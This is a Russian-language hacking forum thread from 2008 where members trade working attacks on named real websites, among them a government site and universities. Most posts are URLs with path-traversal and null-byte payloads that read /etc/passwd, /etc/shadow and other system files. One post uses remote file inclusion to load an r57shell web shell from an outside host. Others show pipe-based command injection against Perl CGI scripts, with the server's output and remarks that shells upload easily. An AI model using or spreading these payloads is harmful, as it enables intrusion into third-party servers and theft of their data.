PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Начал изучать пхп иньекты,вот что из этого вышол:
    Code:
    http://www.megaspace.com.br/espaco/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    --------------------------------------
    Code:
    http://www.cesarhoteis.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    ---------------------------------------
    Code:
    http://www.redemultiloja.com.br/publico/php/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    ---------------------------------------
    Code:
    http://mundomagico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    ----------------------------------
    Code:
    http://www.cabildoccr.gov.py/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    ------------------------------------
    Code:
    http://salveoplanetaterra.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
    ------------------------------------
    Code:
    http://www.gib-mbh.com/default/index2.php?pagina=../../../../etc/passwd%00
    -----------------------------------
    Code:
    http://heshko.com/en/img.php?gal=../../../../../../../../etc/passwd%00
    --------------------------------------
    Code:
    http://www.jibberjobber.com/static.php?page=../../../etc/passwd%00
    ------------------------------------------
    Code:
    http://home.no.net/vikebygd/index.php?vis=../../../../../../../etc/passwd%00
    ---------------------------------------------
    Code:
    http://www.pontewinery.com/php/index.php5?section=../../../../../../etc/passwd%00
    --------------------------------------------
    Code:
    http://www.ays-clan.de/include.php?path=../../../../../../../../etc/passwd%00
    -----------------------------------------------
    Code:
    http://www.thehype.de/kambodscha/forum/forum/YaBB.pl?board=../../../../../../../../etc/passwd%00
    -------------------------------------------
    Code:
    http://www.eifn.ipacv.ro/index.php?action=../../../../../etc/passwd%00
    -----------------------------------------------
    Code:
    http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00
    ---------------------------------------
    The End!
     
    1 person likes this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.wiscnews.com/archives/read.php?info=../../etc/passwd
    ---------------------------------
    Code:
    http://www.omega.ntnu.no/infosider/omomega.php?vis=../../../../../../etc/passwd%00
    -------------------------------
    Code:
    http://www.ies.krakow.pl/konferencje/xxiii/index.php?link=../../../../../etc/passwd
    ------------------------------
    Code:
    http://forum.autonet.ca/cgi-bin/lookup.pl?user=../../../../../../etc/passwd%00
    -------------------------------
    Code:
    http://www.tvmovie.de/dummy.123.0.html?&detail=../../../../../../../../../../../etc/passwd%00
    --------------------------------
    Code:
    http://www.teddy.cx/index.php?site_id=../../../../etc/passwd%00
    -------------------------------
    Code:
    http://www.thomasgray.org/cgi-bin/display.cgi?text=../../../../../etc/passwd%00
    -------------------------------
    Code:
    http://www.yap.org.az/cgi-bin/datacgi/database.cgi?file=../../../../../../../../etc/passwd%00
    -------------------------------
    Code:
    http://video.opalenica.com/index.php?sl=../../../../../../../etc/passwd%00
    -------------------------------
    The End!
     
  3. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Был такой или нет без понятия сори если что.....

    http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/passwd%00
    http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/hosts%00
    http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/ftpusers%00
    http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/services%00
    http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/group%00
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.plaxis.nl/?cat=../../../../../../../../../etc/passwd%00
    Code:
    http://www.tda.as/en/index.php?id=/etc/passwd%00
    Code:
    http://www.bcs.hu/letoltes.php?d_id=../../../../../../etc/passwd
    Code:
    http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
    Code:
    http://www.gkflora.no/index.php?side=/etc/passwd%00
    Code:
    http://www.hermes.bz/autohouse/system/index.cgi?p_act=../../../../../../../../etc/passwd%00
     
  5. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    Вот от меня забираем и говорим спасибо =)

    http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
    http://www.rockfreak.de/index.php?page=[INCLUDE] - UNIX
    http://skc-murman.ru/index.php?page=[INCLUDE]&catid=2 - UNIX, SAFE_MODE
     
    1 person likes this.
  6. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://singletreffen.de/index.php3?session=&id=../../../etc/passwd%00
     
  7. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    www.profucom.com.mx

    www.profucom.com.mx
    Profucom de México S.A de C.V. - Tecnología a Tu alcance
    Code:
    http://www.profucom.com.mx/profucom/atencion/help.php?css_path=../../../../../../etc/passwd%00
     
    1 person likes this.
  8. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    http://www.rockfreak.de/index.php?page=http://pizdil.freehostia.com/r57shell.txt
    http://www.izetit.de/index_projekte.php?page=http://pizdil.freehostia.com/shell - тут загвоска тут подставляет автоматом .htm
     
  9. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    www.grammi.edu.gr/gr/index.php?page=about.htm
    www.grammi.edu.gr/gr/about.htm
    www.grammi.edu.gr/gr/index.php?page=../images/aganargyroi_pic1.jpg
     
    #789 .Begemot., 2 Dec 2008
    Last edited: 2 Dec 2008
    2 people like this.
  10. Neoveneficus

    Neoveneficus Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    235
    Likes Received:
    126
    Reputations:
    23
    Code:
    http://www.aquazoo.it/catalog/modules.php?op=modload&name=phpbb2&file=../../../../../../../../etc/passwd
    только passwd - permission denied
    можно что-нибудь по-вкуснее инклюдить
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.volgogradtour.ru/script.php?s=../../../../../../../../../../../../../etc/passwd%00&c=24&m=60
    http://sex-flirt.com/index.php3?id=../../../../../../../../../../../../../../../etc/passwd%00
    http://singletreffen.de/index.php3?session=&id=../../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    2 people like this.
  12. +BemepoK+

    +BemepoK+ Member

    Joined:
    6 Dec 2008
    Messages:
    27
    Likes Received:
    11
    Reputations:
    -2
    1 person likes this.
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    www.singlespeed.org.uk
    Code:
    http://www.singlespeed.org.uk/article.php?file=../../../../../etc/passwd
    
    www.videnet.gatech.edu
    Code:
    http://www.videnet.gatech.edu/cookbook.en/list_page.php?topic=6&url=../../../../../../etc/passwd&level=1&sequence=1&name=Best+Practices+for+the+Vid
    
     
    3 people like this.
  14. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Code:
    http://firstshot.org/index.php?content_file=../../../../../../etc/passwd
    Code:
    http://www.mrsmalls.com/NewPHP/home.php?section=../../../../../../etc/passwd%00
    Code:
    http://aeroregister.net//home.php?page=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://www.hackshit.com/?page=../../../../../etc/passwd%00
     
    10 people like this.
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 - PHP - include
    http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/shadow%00 - узнаем пути
    /www/www.cs.rmit.edu.au/special/fedconf/index.html =))
    http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
     
    #795 Tigger, 10 Dec 2008
    Last edited: 10 Dec 2008
    1 person likes this.
  16. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    Давненько активности небыло
    http://www.triton.eu/default_en.php?url=../../../../../../../../etc/hosts
     
  17. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    win

     
  18. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Атака по перлам
    Бажный perl скрипт на японском ресурсе.
    Code:
    http://tsukuba3.net/cgi-bin/albm.cgi?file=|id|
    uid=1170(chicappa.jp-tsukuba3) gid=1000(ChicappaUser) groups=1000(ChicappaUser)
    Code:
    http://tsukuba3.net/cgi-bin/albm.cgi?file=|pwd|
    /home/sites/chicappa.jp/users/chicappa.jp-tsukuba3/web/cgi-bin
    Code:
    http://tsukuba3.net/cgi-bin/albm.cgi?file=|which%20lynx|
    /usr/bin/lynx
    lyns присутствует(wget'a нету). Шелл заливается без проблем. Выкладывать не буду.
    Кому надо сам зальет.


    ещё нашел.
    Code:
    http://data.ccarnet.org/cgi-bin/respdisp.pl?file=../../../../../../../../../../../etc/passwd
     
    #798 The matrix, 17 Dec 2008
    Last edited: 17 Dec 2008
  19. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Code:
    http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|id|
    uid=80(www) gid=80(www) groups=80(www)
    Code:
    http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|pwd|
    /var/www/cgi-adm
    Code:
    http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|which%20fetch|
    /usr/bin/fetch
    походу только fetch есть. И через него отлично все заливается. Опять же не буду выкладывать шелл. Кто хочет, без всяких проблем сам зальет

    Атака по перлам закончена
     
    2 people like this.
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.klassika.ru/read.html?proza/../

    ыы
     
    #800 попугай, 18 Dec 2008
    Last edited: 18 Dec 2008